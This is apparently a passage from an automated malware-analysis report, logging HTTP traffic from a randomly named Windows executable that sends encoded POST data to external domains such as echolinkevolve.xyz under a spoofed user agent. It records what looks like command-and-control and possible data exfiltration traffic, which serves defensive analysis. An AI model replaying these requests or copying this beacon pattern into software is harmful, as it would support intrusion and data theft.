                                                                                                                              Data Ascii: N3C1zBrQ4kuv27b82LmZU+iUovzse89fo72tTAo8+TnGmBtFe2ComF/pvGdYnRKF6DwFyqhec5zb/aFd6abkc4SLJa7Hg4nvq0/Klrf3eOv9DsvK4+w5MKYF7YuQ9RUHb2U6HTAgvATYF8dsSh3CoGYOSPnHPlVfDirDFv1IaFmFo9Cd95vd0UYpIZgs+Dx3Z6+UgPHcSlG5tYtm62nh/17B/TvU0+jxTpzhRWv8+WnfnHqmsVH
                                                                                                                              Dec 4, 2023 15:27:09.317641020 CET3912OUTData Raw: 61 33 33 59 34 45 71 5a 66 68 42 51 4c 6e 52 54 2f 6d 6d 79 34 30 4c 2b 70 7a 48 2f 79 48 4b 55 5a 49 62 65 4f 2b 50 51 77 72 78 74 32 61 39 38 35 6d 34 34 75 4d 30 7a 71 52 53 68 42 5a 51 4e 53 4c 39 30 36 6c 33 64 74 58 73 64 77 68 38 66 4e 6b
                                                                                                                              Data Ascii: a33Y4EqZfhBQLnRT/mmy40L+pzH/yHKUZIbeO+PQwrxt2a985m44uM0zqRShBZQNSL906l3dtXsdwh8fNkUpj6zSpUqM4GfwsXhHIlvckydlNDdTzgsHaKtrKYCfhFw/vfg45Aln9wWHzQLtiy7zDA0IddK7YZJ6w/Kpy83N85Cuk4ZZzQgCW65oQSFneE0SacapoMSbtpVJY2bTsVHq/mG/y4E6tuJZwBf4zN9KYV8wu1dMl+0
                                                                                                                              Dec 4, 2023 15:27:09.317836046 CET11628OUTData Raw: 69 32 6f 62 6a 68 6d 6c 59 55 49 35 53 75 4d 54 5a 41 70 71 66 2b 63 4e 38 48 41 6e 57 45 51 57 31 36 45 78 54 79 37 76 61 7a 48 45 77 54 56 39 53 70 46 41 43 67 70 47 59 64 45 54 58 58 54 68 4a 4f 69 58 46 68 74 30 47 52 65 45 49 4a 73 4e 49 35
                                                                                                                              Data Ascii: i2objhmlYUI5SuMTZApqf+cN8HAnWEQW16ExTy7vazHEwTV9SpFACgpGYdETXXThJOiXFht0GReEIJsNI5ZqGt8JLwroeA0vYm0kZVyXKXmt8YXyua0CZ/MKLFJ3Mzv2I/4wAn4nLq1oFT8usxSgQYXG2gdafGhM8LGjN2wvkP2ZXIxPWLuIKo6cPDGqTxnRtCR6+ZzYp5hLT3pQficrH0+dGiFYezBmOsTF24ozygG4i/spwpf
                                                                                                                              Dec 4, 2023 15:27:09.318156958 CET3912OUTData Raw: 68 6a 44 74 4b 31 41 59 64 45 6b 66 6e 62 2b 57 55 67 42 4d 6d 51 31 2b 54 77 4d 38 45 62 43 61 47 2b 41 71 66 58 39 36 74 47 45 66 4b 79 35 75 70 49 58 70 45 30 48 6a 39 6c 50 41 55 59 7a 4f 43 42 64 6f 31 33 5a 66 72 7a 79 31 46 51 74 4a 34 65
                                                                                                                              Data Ascii: hjDtK1AYdEkfnb+WUgBMmQ1+TwM8EbCaG+AqfX96tGEfKy5upIXpE0Hj9lPAUYzOCBdo13Zfrzy1FQtJ4ebVbSQT/ulpdDlRsw2h4Ki7siUo+hiUw7xeVqTrOQJeH+P/rIHh6XrDjQwpCmcwn+UdDQCrnKF9Xv8Qqr5cWuyY2f6KqZ9tlAQvO8GHBxHtpkjmO+NidVzZyMp0HHvAi+l2rDCzJmVEVap4uMw/XB+1p22lgIPfs+7
                                                                                                                              Dec 4, 2023 15:27:09.318330050 CET6484OUTData Raw: 72 6c 7a 6c 4d 32 31 76 64 58 54 53 47 4b 37 48 53 37 4b 36 4d 36 5a 4f 31 4a 55 67 33 53 51 4b 75 50 6d 6e 32 54 39 4a 70 6b 34 38 4f 79 6e 6b 67 65 65 62 31 7a 6a 71 7a 74 41 7a 6e 43 78 62 6f 36 70 2b 32 52 56 6f 30 6b 34 65 37 78 41 50 62 48
                                                                                                                              Data Ascii: rlzlM21vdXTSGK7HS7K6M6ZO1JUg3SQKuPmn2T9Jpk48Oynkgeeb1zjqztAznCxbo6p+2RVo0k4e7xAPbHVaMbImkOL9Y3VmkoCUw8KCk5pQHBPU7B9LfB1R6u9QTcb5/iaAQdKWdsHCPjrHNtwLuNaZZwzrPbye9jrzncU+2qQnB9Tnp6xTAubdfycfV62uwpYHmGKNwOwLz18R7FqILrgDpn5n1S2Rp0fPXf99nJI62csL9Jl
                                                                                                                              Dec 4, 2023 15:27:09.435259104 CET2626OUTData Raw: 77 4f 45 78 72 62 36 73 33 44 4d 70 41 78 56 69 58 73 73 75 68 63 4d 51 33 68 50 7a 49 64 33 66 6d 59 74 66 45 4e 69 77 64 46 75 55 46 35 57 43 6a 31 4b 6b 37 46 56 63 59 41 47 74 62 73 56 71 6b 48 71 37 59 6c 63 4e 6a 51 2b 74 54 61 44 47 62 48
                                                                                                                              Data Ascii: wOExrb6s3DMpAxViXssuhcMQ3hPzId3fmYtfENiwdFuUF5WCj1Kk7FVcYAGtbsVqkHq7YlcNjQ+tTaDGbHiDUuxu69arf4159AJWlC62JfkcSX8xbOIg7JWE3M6TznmqxPz7Xu7Qxv/M9G8mq7a/gcoqWqDb7ew9EIDpsJCWTSlb1pezt5IXjhVtFzqR/+Tvv5NIPln3pg5ryWZfIuQmREUNgNT1n7ogCUcCHUoTrKGpaXX4O9U
                                                                                                                              Dec 4, 2023 15:27:09.435456991 CET10342OUTData Raw: 6c 61 2b 77 53 57 5a 2b 65 79 2f 49 65 73 2f 77 38 49 36 54 64 31 6f 63 74 42 6c 70 76 75 38 44 72 4e 62 56 5a 4c 72 77 6d 30 55 71 44 30 39 33 4f 57 62 68 65 66 67 73 54 55 65 71 33 43 57 43 35 62 44 71 34 75 56 78 6b 72 70 50 38 35 39 73 64 68
                                                                                                                              Data Ascii: la+wSWZ+ey/Ies/w8I6Td1octBlpvu8DrNbVZLrwm0UqD093OWbhefgsTUeq3CWC5bDq4uVxkrpP859sdh6zMfS5OlRzO7IlET2D+Tz7WdMAyw4CdNlCMi2Q84ZIYmzDCrtSwn1UXxgdis5L1UrfnPfr4PYA2YZG02r9j8/CVlxMUKu243nZEn6rNF2VkD1TRmpkMsDUGN45m3N8bM/dmUhpvb6NVIyuVTUIuH/vSto0MQmMCrc
                                                                                                                              Dec 4, 2023 15:27:09.435554028 CET1340OUTData Raw: 45 2b 68 73 41 45 37 6f 38 4c 69 63 5a 74 6c 30 4b 41 77 54 31 51 54 4b 59 63 4f 42 41 34 6b 63 7a 32 7a 77 42 77 2f 65 52 79 6d 49 39 49 77 2b 46 38 50 54 59 36 67 61 35 75 45 35 67 70 6e 35 32 74 61 77 2f 5a 51 42 59 42 70 63 4e 36 6f 36 74 76
                                                                                                                              Data Ascii: E+hsAE7o8LicZtl0KAwT1QTKYcOBA4kcz2zwBw/eRymI9Iw+F8PTY6ga5uE5gpn52taw/ZQBYBpcN6o6tvJriqfFRf7UaLz//B4DXwgH2TtmACH8McI6YE5/tUsphXSmVIfFp5QzLTYrEXzJqkkrleUf8JRoHvXendm8lyUV8cm97iPp7X9xLsa58LE7Yy3yc/Xa4EYXjDouprqEhpLx0Un38gVt6EKocgDRLXP7EINmMizcbdL
                                                                                                                              Dec 4, 2023 15:27:09.435771942 CET838OUTData Raw: 4c 37 56 4f 71 7a 38 41 64 4e 6c 32 68 6f 72 56 49 32 6f 5a 52 50 71 48 63 76 52 72 64 59 4f 67 69 5a 34 74 59 74 30 4b 64 58 50 66 54 34 51 4a 44 50 6f 6b 6c 34 59 4e 63 51 51 62 7a 67 5a 69 33 79 4d 73 47 48 31 47 55 47 44 46 34 52 67 4d 4e 54
                                                                                                                              Data Ascii: L7VOqz8AdNl2horVI2oZRPqHcvRrdYOgiZ4tYt0KdXPfT4QJDPokl4YNcQQbzgZi3yMsGH1GUGDF4RgMNTKuxc5DCiRNEabspl8ZuS+NeL/v97gCwkIlHKlYmvM4nXRIbUZIjsZz/yirTVmgp1owOsSrg01jMbbkVjQZbSrDhUTflz4LzYuGYV9wuj5ZV1NfpTGrXvPuLDuFWhitTv5uL8AZe56rET9XWfUbJHr4N+1rW6iRdE5
                                                                                                                              Dec 4, 2023 15:27:09.686672926 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:09 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f 5e 3c df 67 d6 c5 ef 49 37 c0 ef a8 3f d8 39 b7 77 ce bd 9d 33
                                                                                                                              Data Ascii: RrG}} A,o1Z9$9r0"U}mV7n$-Js9{,s !d;G20D)U`sC")f,0]Q"8+9e*\|?*SUa0>[ZaxJ|$o@O?DUJN],;S1p8&LDqE1f%l,/dWPn@jpb9g5L_i"dbSELE^({!OO<PX}bRAo]:R,7Gs&b9.9dcH4kgB53Z|?[}\G,]/?Nz/^,~XXvUC<,TAe^<wx[K]b81]3PB92M_Z& @!xLO-7XK4gT-8]IQuRHReK|0'c7FT4ql{8(Ml$Qjnn6y1,5"U4V;3aIX&pj704O,_0_xrD1-5n<(9S(AhecWyzx~54kY1;BG9SNg*mE<D=v>Sv*LJk|nO?UMv/^<gI7?9w3
                                                                                                                              Dec 4, 2023 15:27:09.686713934 CET1340INData Raw: d4 e7 0f f6 26 e9 6e e0 77 92 f7 22 ed 3b 91 de 9d 08 3c dc 07 a1 9b a7 e5 0a 20 93 97 6c bd 83 9d 49 2d 67 98 86 3b f4 26 eb 4d 6c 5e db 3b af 9b 59 0e 15 4e 0e 16 36 6f 56 e8 e1 d6 31 d3 b5 63 66 54 11 35 76 0a 81 65 4c 40 ec 3c 1f 9b 65 0e 72
                                                                                                                              Data Ascii: &nw";< lI-g;&Ml^;YN6oV1cfT5veL@<erJ!rBH>%LhCETRNuN^1kp2iXyWRXC;vZs;~/0/GfKyC9;FNzS; v Urlt< )5Z44hP


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              69192.168.11.2050200108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:11.838695049 CET540OUTGET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:27:12.063363075 CET529INHTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:11 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              X-Redirect-By: WordPress
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Location: http://metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              70192.168.11.2050201198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:17.252863884 CET819OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6a 41 4b 47 78 38 58 74 34 42 38 6a 6f 62 55 50 76 62 48 50 55 34 2b 63 63 62 70 4f 38 79 78 54 63 47 42 4f 35 57 4e 63 4f 6b 48 77 6d 63 41 50 6e 66 4c 58 39 67 6a 39 68 2b 78 56 71 6d 45 50 75 6d 70 48 77 6b 31 74 73 45 4e 5a 50 35 49 64 41 61 42 4d 77 47 34 64 34 72 32 6a 71 4f 58 30 57 46 31 71 4d 69 59 56 32 76 45 4c 6d 79 34 51 51 79 31 32 4a 52 58 39 54 49 74 36 69 4f 70 2f 6a 6a 47 2b 63 49 49 69 4b 4f 5a 41 38 65 64 6d 52 74 4f 75 4e 75 75 42 55 71 78 77 66 72 77 75 45 47 79 47 50 5a 4e 46 51 68 45 66 34 4f 42 51 37 77 3d 3d
                                                                                                                              Data Ascii: TZd=jAKGx8Xt4B8jobUPvbHPU4+ccbpO8yxTcGBO5WNcOkHwmcAPnfLX9gj9h+xVqmEPumpHwk1tsENZP5IdAaBMwG4d4r2jqOX0WF1qMiYV2vELmy4QQy12JRX9TIt6iOp/jjG+cIIiKOZA8edmRtOuNuuBUqxwfrwuEGyGPZNFQhEf4OBQ7w==
                                                                                                                              Dec 4, 2023 15:27:17.570305109 CET587INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:17 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              71192.168.11.2050202198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:19.957865000 CET1159OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6a 41 4b 47 78 38 58 74 34 42 38 6a 70 37 6b 50 74 34 76 50 46 49 2b 64 51 37 70 4f 31 53 78 58 63 47 64 4f 35 58 4a 4d 4f 78 66 77 6e 39 77 50 6b 65 4c 58 78 41 6a 39 35 75 78 51 6b 47 45 47 75 6d 6c 6c 77 6b 4a 74 73 45 4a 5a 50 50 63 64 51 36 42 54 6b 57 34 53 2f 72 32 69 75 4f 58 36 57 46 34 44 4d 6e 34 56 32 63 51 4c 6e 77 51 51 58 6d 42 31 4d 78 57 30 56 49 74 37 72 75 70 59 6a 6a 4b 4d 63 49 41 59 4c 2f 74 41 39 2b 39 6d 44 74 4f 74 48 65 75 43 59 4b 77 30 59 34 42 66 47 47 4b 6d 51 37 78 41 56 68 67 4d 74 50 6b 6c 75 34 4c 56 78 67 4e 6f 6d 2b 59 59 42 43 78 79 70 43 4b 45 58 53 51 54 2b 39 46 6f 45 6f 64 64 63 68 69 50 45 52 41 6d 50 58 4b 58 5a 4b 66 48 6d 34 72 34 68 31 53 61 56 65 63 39 53 62 35 77 48 73 30 37 45 79 30 2b 78 56 4c 66 6b 46 2b 50 34 31 59 6c 6c 74 7a 48 73 6a 57 43 6e 48 30 69 55 51 2f 43 37 6b 48 36 49 50 61 77 52 74 77 46 54 46 61 61 7a 59 4b 41 38 69 6b 72 36 76 72 35 69 61 71 6d 74 46 76 6d 73 51 6e 65 51 43 74 6d 36 33 4a 52 58 71 49 32 67 36 41 43 2f 30 58 54 37 71 7a 33 46 6f 2f 32 42 61 79 4e 34 4e 6b 36 77 61 4d 30 72 39 6f 35 31 6e 49 50 70 43 64 4c 5a 6b 44 67 46 53 69 6c 37 58 51 38 4e 76 70 57 57 6b 42 78 33 74 44 62 6a 75 33 56 77 79 49 6d 44 36 45 41 67 33 51 45 66 58 53 42 76 42 33 73 65 63 77 6e 71 43 38 66 54 68 45 51 6f 2f 64 63 32 6f 32 53 6b 73 78 74 45 76 34 68 70 59 69 64 69 56 63 76 4e 5a 70 75 73 6f 75 54 57 48 6f 64 43 57 33 79 77 45 31 6b 30 6a 48 4f 78 34 65 72 2b 36 4f 37 72 31 6c 32 6b 4d 70 4e 70 39 55 66 48 30 32 71 45 6b 73 46 59 63 30 2b 55 59 30 44 37 31 75 34 77 79 59 3d
                                                                                                                              Data Ascii: TZd=jAKGx8Xt4B8jp7kPt4vPFI+dQ7pO1SxXcGdO5XJMOxfwn9wPkeLXxAj95uxQkGEGumllwkJtsEJZPPcdQ6BTkW4S/r2iuOX6WF4DMn4V2cQLnwQQXmB1MxW0VIt7rupYjjKMcIAYL/tA9+9mDtOtHeuCYKw0Y4BfGGKmQ7xAVhgMtPklu4LVxgNom+YYBCxypCKEXSQT+9FoEoddchiPERAmPXKXZKfHm4r4h1SaVec9Sb5wHs07Ey0+xVLfkF+P41YlltzHsjWCnH0iUQ/C7kH6IPawRtwFTFaazYKA8ikr6vr5iaqmtFvmsQneQCtm63JRXqI2g6AC/0XT7qz3Fo/2BayN4Nk6waM0r9o51nIPpCdLZkDgFSil7XQ8NvpWWkBx3tDbju3VwyImD6EAg3QEfXSBvB3secwnqC8fThEQo/dc2o2SksxtEv4hpYidiVcvNZpusouTWHodCW3ywE1k0jHOx4er+6O7r1l2kMpNp9UfH02qEksFYc0+UY0D71u4wyY=
                                                                                                                              Dec 4, 2023 15:27:20.273545980 CET587INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:20 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              72192.168.11.2050203198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:22.661860943 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.echolinkevolve.xyz
                                                                                                                              Referer: http://www.echolinkevolve.xyz/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
